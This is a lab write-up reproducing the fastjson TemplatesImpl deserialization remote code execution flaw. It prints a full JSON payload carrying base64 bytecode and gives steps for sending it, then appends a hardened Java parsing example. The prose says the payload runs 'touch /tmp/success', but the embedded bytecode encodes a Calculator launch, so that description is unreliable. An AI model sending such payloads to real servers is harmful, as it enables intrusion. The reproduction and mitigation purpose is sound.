
Title: Fastjson deserialization arbitrary command execution vulnerability


Vulnerability principle

http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

https://github.com/shengqi158/fastjson-remote-code-execute-poc

While parsing JSON, fastjson supports autoType: the @type key names a class to instantiate, and that object's attributes are then filled from the JSON. The JDK's own class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl has a private property _bytecodes, and some of its methods execute the Java bytecode held in that value.

So, to execute arbitrary commands through the _bytecodes attribute of TemplatesImpl, several conditions must hold:

The target website uses the fastjson library to parse JSON.

Feature.SupportNonPublicField is set during parsing; otherwise private properties cannot be supplied from the input.

The TemplatesImpl class exists in the JDK used by the target.

Of course, other approaches that do not require TemplatesImpl are not ruled out.

Vulnerability reproduction

The directory structure of this environment is as follows:

src                   source code of this project
  main/java           Java classes
    IndexFilter.java  web application source
    Poc.java          POC source
pom.xml               Maven configuration; compiles this project directly into a war package
exploit.php           reads the compiled POC bytecode and converts it to base64
fastjson-1.0.war      the packaged web environment; can be dropped under Tomcat to run

Generating the bytecode

The first step is to write a Java class that executes the command, then compile it to obtain the .class file and its bytecode.

Modify the command to execute in Poc.java, then compile the project with Maven in this directory to generate target/classes/Poc.class:

mvn compile

If Maven is not installed, you can also use WEB-INF/classes/Poc.class from the fastjson-1.0.war archive directly. This class file, which I compiled, is the one read in exploit.php.

Constructing the POC

After generating the .class file, base64-encode its contents and place the result in the JSON as the value of _bytecodes, as follows:

{'@type':'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl','_bytecodes':['yv66vgAAADQANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAVMUG9jOwEACkV4Y2VwdGlvbnMHACwB AAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF 4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi 9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b 3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFj aGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmmlhbGl6YXRpb25IYW5kbGVyOylWAQAJaGF GbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwAtAQAEbWFpbgEAFihbTGphdmEvbGFuZy 9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAXQHAC4BAApTb3VyY2VGaWxlAQAIUG9jLmphdmEMAAgACQcALwwAMAAxAQAhb3BlbiAvQXBwbGljYXRpb 25zL0NhbGN1bGF0b3IuYXBwDAAyADMBAANQb2MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2 YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABF qYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3 M7ACEABQAHAAAAAAAEACAAAAAAAAAAJAAIACgAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAAAEAAEAE 
AABABEAEgABAAoAABJAAAAABAAAAAAGxAAAAAAAAGALAAAAAABgABAAAAAEQAMAAAAKgAEAAAAAQANAA4AAAAAAAAEAEwAUAAAAAAABABUAFgACAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABUAFgACAAAAAAAAQAXABgAAWABEAGQACAAOAAAAA/AAAAAwAAAAGxAAAAAgALAAAABgABAAAAFgAMAAAAIAADAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABoAGwACAA8AAAAEAAEAHAAJAB0AHgACAAoAAABBAAIAAgAAAAm7AAVZtwA GTLEAAAACAAsAAAAKAAAAAAZAAAGAGgAMAAAAFgACAAAAACQAfACAAAAAIAIAEAIQAOAAEADwAAAAQAAQAiAAAEAIwAAAAAAAAAAAJA=='],'_name':'a.b','_tfactory':{ },'_outputProperties':{ },'_version':'1.0','allowedProtocols':'all'}

To use the already compiled .class file, run php exploit.php directly to obtain the POC.

It was compiled with JDK 1.8 and the command executed is touch /tmp/success, so execution will fail on Windows. Windows users should modify Poc.java themselves and generate their own POC.

Exploitation

The target is a web application; visiting it returns "Hello world". Normally a JSON document is POSTed, and the target extracts name and age from the JSON object and splices them into a sentence that it returns.

Send the POC obtained in step 2, and the command executes successfully: the /tmp/success file is created on the target.
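The conditions listed under the vulnerability principle (autoType with a caller-chosen @type, plus Feature.SupportNonPublicField) and the name/age endpoint described above point to where the fix belongs. The following is an added example, not code from the original post or from the fastjson project: it puts the parsing pattern that makes the TemplatesImpl gadget reachable next to a hardened version. The class SafeParser and the User holder are this example's own, it assumes fastjson 1.2.68 or later on the classpath for ParserConfig.setSafeMode, and the sample documents are constructed.

```java
// Added example, not code from the original post or from the fastjson project.
// Assumes fastjson 1.2.68+ (ParserConfig.setSafeMode). SafeParser and User are
// this example's own names.
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;

public class SafeParser {

    /** Plain data holder for what the endpoint actually expects: name and age. */
    public static class User {
        private String name;
        private int age;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
        public int getAge() { return age; }
        public void setAge(int age) { this.age = age; }
    }

    /**
     * VULNERABLE pattern (do not use). The target type is Object, so the "@type"
     * key in the document decides which class is instantiated, and
     * Feature.SupportNonPublicField lets the document write private fields such
     * as TemplatesImpl._bytecodes.
     */
    public static Object parseUnsafe(String body) {
        return JSON.parseObject(body, Object.class, Feature.SupportNonPublicField);
    }

    /**
     * Hardened pattern: bind to a concrete class, turn autoType off, and never
     * enable SupportNonPublicField, so only User's public setters are reachable.
     */
    public static User parseSafe(String body) {
        // Defense in depth only: refuse documents that try to pick their own class.
        // The parser also accepts escaped key names, so this literal check is not
        // the control; the typed target and autoType settings below are.
        if (body.contains("@type")) {
            throw new JSONException("polymorphic type key not allowed");
        }
        ParserConfig config = ParserConfig.getGlobalInstance();
        config.setAutoTypeSupport(false); // @type resolution off (default since 1.2.25)
        config.setSafeMode(true);         // 1.2.68+: autoType fully disabled, allow lists ignored
        return JSON.parseObject(body, User.class);
    }

    public static void main(String[] args) {
        // Constructed samples. The second uses a harmless class name; a real
        // payload would name TemplatesImpl and carry _bytecodes.
        String benign = "{\"name\":\"alice\",\"age\":30}";
        String typed  = "{\"@type\":\"java.lang.Object\",\"name\":\"alice\"}";

        User u = parseSafe(benign);
        System.out.println(u.getName() + " is " + u.getAge());

        try {
            parseSafe(typed);
        } catch (JSONException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Binding the input to User means a document can only reach User's public setters, whatever @type says, and with autoType disabled the class name is never resolved at all. For the 1.2.24 environment in this post neither setting is available, so the only real fix there is upgrading fastjson; the literal @type check is worth keeping as a log-and-reject signal, not as the sole control.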
